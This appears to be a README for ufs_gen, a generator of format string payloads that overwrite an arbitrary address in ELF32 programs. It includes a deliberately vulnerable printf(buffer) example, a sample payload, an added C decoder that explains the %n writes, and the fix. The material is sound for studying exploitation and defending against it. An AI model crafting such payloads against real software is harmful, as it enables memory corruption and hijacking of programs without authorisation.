ufs_gen
=======

This software generates a format string payload that overwrites the contents
of an address with the value of your choice.

The syntax is quite simple: the program needs three parameters to run
correctly.

stackidx: the number of dwords that must be skipped on the stack to reach the
beginning of your buffer (or payload).

override: the address to override

with: the value to write at the overridden address

This software is intended to work with an ELF32 binary built from typical
code, for example:

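#include <stdio.h>
#include <string.h>

int function(const char *payload)
{
    char buffer[BUFSIZ];

    /* copy the payload into a temporary buffer on the stack */
    strncpy(buffer, payload, sizeof(buffer));
    buffer[sizeof(buffer) - 1] = '\0';

    /* vulnerable call: buffer is used as the format string */
    printf(buffer);

    return 0;
}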

Support for ELF64 and other formats is intended but not written yet.
Although the 'addrsize' option can already be used to specify that an address
is not 4 bytes long, it is very unlikely to work correctly.

Support for calling printf(payload) directly (i.e. without a temporary buffer)
is also planned.

Example
=======

user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n
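
Added example (not part of ufs_gen): a small C decoder for reviewing an output line like the one above. It replays printf's character count to show which byte each %N$n stores. The names decode_writes, fmt_write, sample and decoded_value are hypothetical, and the sample string is constructed from the README's example with the address bytes written as escapes.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>

/* One %N$n directive: the stack argument it dereferences and the low byte
 * of printf's running character count, which lands at that address. */
struct fmt_write { int arg_index; unsigned char low_byte; };

/* Replays printf's output count over literal bytes, %<width>x and
 * %<index>$n only (the directives in the README example). Assumes every
 * width is >= 8, so padding fixes the field length on ELF32. Returns the
 * number of %n writes, or -1 on anything this decoder does not model. */
int decode_writes(const char *fmt, struct fmt_write *out, int max)
{
    unsigned long count = 0;
    int n = 0;
    while (*fmt) {
        if (*fmt != '%') { count++; fmt++; continue; }
        if (!isdigit((unsigned char)fmt[1])) return -1;
        char *end;
        unsigned long num = strtoul(fmt + 1, &end, 10);
        if (*end == 'x') {
            count += num;
            fmt = end + 1;
        } else if (end[0] == '$' && end[1] == 'n' && n < max) {
            out[n].arg_index = (int)num;
            out[n++].low_byte = (unsigned char)(count & 0xff);
            fmt = end + 2;
        } else return -1;
    }
    return n;
}

/* Constructed sample: the README's output line with the four target
 * addresses (0x11223344..47, little-endian) written as escapes. */
static const char sample[] =
    "\x44\x33\x22\x11" "\x45\x33\x22\x11" "\x46\x33\x22\x11" "\x47\x33\x22\x11"
    "%120x%4$n%239x%5$n%239x%6$n%239x%7$n";

/* Each %n stores a whole int, so only its low byte survives the next write. */
unsigned long decoded_value(void)
{
    struct fmt_write w[4];
    unsigned long v = 0;
    if (decode_writes(sample, w, 4) != 4) return 0;
    for (int i = 0; i < 4; i++) v |= (unsigned long)w[i].low_byte << (8 * i);
    return v;
}
int main(void) { printf("0x%08lx\n", decoded_value()); return 0; }
```

The fix for the vulnerable function is to pass the buffer as data, printf("%s", buffer); gcc's -Wformat-security flags the original call.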

License
=======

This software is free software covered by the GPL v2. You should read the
COPYING file to understand what that implies.